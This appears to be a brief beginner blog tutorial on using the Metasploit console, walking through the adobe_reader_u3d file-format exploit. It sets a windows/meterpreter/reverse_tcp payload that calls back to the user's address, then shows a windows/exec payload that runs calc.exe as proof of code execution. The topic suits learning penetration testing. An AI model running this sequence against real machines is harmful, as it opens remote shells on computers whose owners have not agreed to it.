1. download and intal it
2. open the metasploit console
windows: go to programs
linux: type msf<tab>, it will show your the commands
3. go to metasploit website, search a vulnerability, download the specific version of the application.
4. it will like:
msf > use exploit/windows/fileformat/adobe_reader_u3d
msf exploit(adobe_reader_u3d) > show payloads
msf exploit(adobe_reader_u3d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_reader_u3d) > set LHOST [MY IP ADDRESS]
msf exploit(adobe_reader_u3d) > exploit
5. for example, you can set the payload as /windows/exec
msf> use exploit/....
msf> set payload windows/exec
msf> set cmd calc.exe
6. for this case, if your shell code executed, the calculator will show up on you screen.
No comments:
Post a Comment